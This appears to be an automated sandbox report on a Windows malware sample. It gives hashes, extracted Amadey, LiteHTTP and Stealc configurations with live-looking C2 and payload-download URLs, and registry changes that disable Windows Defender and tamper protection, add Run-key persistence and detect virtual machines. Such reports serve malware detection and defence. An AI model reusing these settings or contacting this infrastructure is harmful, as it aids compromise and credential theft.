Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 21:29
Static task
static1
Behavioral task
behavioral1
Sample
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
Resource
win10v2004-20250217-en
General
-
Target
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
-
Size
938KB
-
MD5
865b70535cac91a7fb0a5e7453798edc
-
SHA1
bf3e1c9613ef801ad1ff939717bce851cc555282
-
SHA256
f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c
-
SHA512
73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138
-
SSDEEP
24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3356-571-0x00000000000F0000-0x000000000054E000-memory.dmp healer behavioral1/memory/3356-572-0x00000000000F0000-0x000000000054E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 80a506a4b9.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 80a506a4b9.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 80a506a4b9.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 80a506a4b9.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 80a506a4b9.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c39706eca6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f0d7603e98.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cccfebf586.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1fc666ec69.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 80a506a4b9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3178e88ae0.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1100 powershell.exe 8 2156 powershell.exe 9 3008 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2724 powershell.exe 3008 powershell.exe 1976 powershell.exe 1100 powershell.exe 2156 powershell.exe 2520 powershell.exe 2392 powershell.exe 2228 powershell.exe 1740 powershell.exe 1976 powershell.exe -
Downloads MZ/PE file 11 IoCs
flow pid Process 29 2004 BitLockerToGo.exe 4 1100 powershell.exe 8 2156 powershell.exe 9 3008 powershell.exe 72 2144 rapes.exe 119 2144 rapes.exe 7 2144 rapes.exe 7 2144 rapes.exe 7 2144 rapes.exe 7 2144 rapes.exe 16 2808 BitLockerToGo.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f0d7603e98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c39706eca6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1fc666ec69.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3178e88ae0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3178e88ae0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1fc666ec69.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 80a506a4b9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c39706eca6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f0d7603e98.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cccfebf586.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cccfebf586.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 80a506a4b9.exe -
Executes dropped EXE 19 IoCs
pid Process 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 2144 rapes.exe 1616 ce4pMzk.exe 848 68271cbb99.exe 1464 TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE 1532 483d2fa8a0d53818306efeb32d3.exe 1524 ktxzLhN.exe 1564 dll32.exe 880 3178e88ae0.exe 2916 777e11d160.exe 1700 777e11d160.exe 2292 c39706eca6.exe 1192 f0d7603e98.exe 2692 cccfebf586.exe 2852 1fc666ec69.exe 956 a9c3a998e8.exe 3356 80a506a4b9.exe 3736 ktxzLhN.exe 3828 dll32.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 3178e88ae0.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine c39706eca6.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine cccfebf586.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine f0d7603e98.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 1fc666ec69.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine 80a506a4b9.exe -
Loads dropped DLL 44 IoCs
pid Process 1100 powershell.exe 1100 powershell.exe 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 2144 rapes.exe 2144 rapes.exe 2156 powershell.exe 2156 powershell.exe 3008 powershell.exe 3008 powershell.exe 2144 rapes.exe 1564 dll32.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2916 777e11d160.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 1492 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 340 WerFault.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2896 WerFault.exe 2896 WerFault.exe 2896 WerFault.exe 2144 rapes.exe 2144 rapes.exe 2808 BitLockerToGo.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 2144 rapes.exe 3828 dll32.exe 2004 BitLockerToGo.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 80a506a4b9.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 80a506a4b9.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\cccfebf586.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106970101\\cccfebf586.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\1fc666ec69.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106980101\\1fc666ec69.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\a9c3a998e8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106990101\\a9c3a998e8.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\80a506a4b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107000101\\80a506a4b9.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\68271cbb99.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106670101\\68271cbb99.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\pDcYrl4C\\Anubis.exe\"" ce4pMzk.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 raw.githubusercontent.com 118 raw.githubusercontent.com 11 raw.githubusercontent.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000186c8-56.dat autoit_exe behavioral1/files/0x000600000001a42b-409.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 32 IoCs
pid Process 2392 tasklist.exe 1508 tasklist.exe 1700 tasklist.exe 1220 tasklist.exe 3644 tasklist.exe 3132 tasklist.exe 2688 tasklist.exe 3132 tasklist.exe 3560 tasklist.exe 2092 tasklist.exe 2676 tasklist.exe 2528 tasklist.exe 2448 tasklist.exe 2976 tasklist.exe 3996 tasklist.exe 2120 tasklist.exe 1660 tasklist.exe 1084 tasklist.exe 3936 tasklist.exe 1176 tasklist.exe 2268 tasklist.exe 2356 tasklist.exe 3508 tasklist.exe 1996 tasklist.exe 3008 tasklist.exe 2468 tasklist.exe 396 tasklist.exe 3304 tasklist.exe 3760 tasklist.exe 3880 tasklist.exe 1040 tasklist.exe 4072 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2852 TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE 2144 rapes.exe 1464 TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE 1532 483d2fa8a0d53818306efeb32d3.exe 880 3178e88ae0.exe 2292 c39706eca6.exe 1192 f0d7603e98.exe 2692 cccfebf586.exe 2852 1fc666ec69.exe 3356 80a506a4b9.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2916 set thread context of 1700 2916 777e11d160.exe 75 PID 880 set thread context of 2808 880 3178e88ae0.exe 78 PID 2292 set thread context of 2004 2292 c39706eca6.exe 88 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1492 2916 WerFault.exe 74 340 1700 WerFault.exe 75 2896 2692 WerFault.exe 101 -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 80a506a4b9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68271cbb99.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 777e11d160.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage a9c3a998e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language a9c3a998e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 777e11d160.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f0d7603e98.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cccfebf586.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3178e88ae0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c39706eca6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1fc666ec69.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a9c3a998e8.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 33 IoCs
pid Process 1236 timeout.exe 840 timeout.exe 1404 timeout.exe 3152 timeout.exe 2260 timeout.exe 2192 timeout.exe 344 timeout.exe 3916 timeout.exe 944 timeout.exe 840 timeout.exe 2628 timeout.exe 1504 timeout.exe 3544 timeout.exe 3340 timeout.exe 3680 timeout.exe 3796 timeout.exe 4032 timeout.exe 2016 timeout.exe 2404 timeout.exe 2592 timeout.exe 3972 timeout.exe 2524 timeout.exe 3048 timeout.exe 2696 timeout.exe 3172 timeout.exe 3596 timeout.exe 3208 timeout.exe 1240 timeout.exe 2852 timeout.exe 2568 timeout.exe 580 timeout.exe 880 timeout.exe 2060 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2180 taskkill.exe 2156 taskkill.exe 2904 taskkill.exe 2596 taskkill.exe 792 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a cccfebf586.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 cccfebf586.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a cccfebf586.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 840 schtasks.exe 2812 schtasks.exe 2084 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
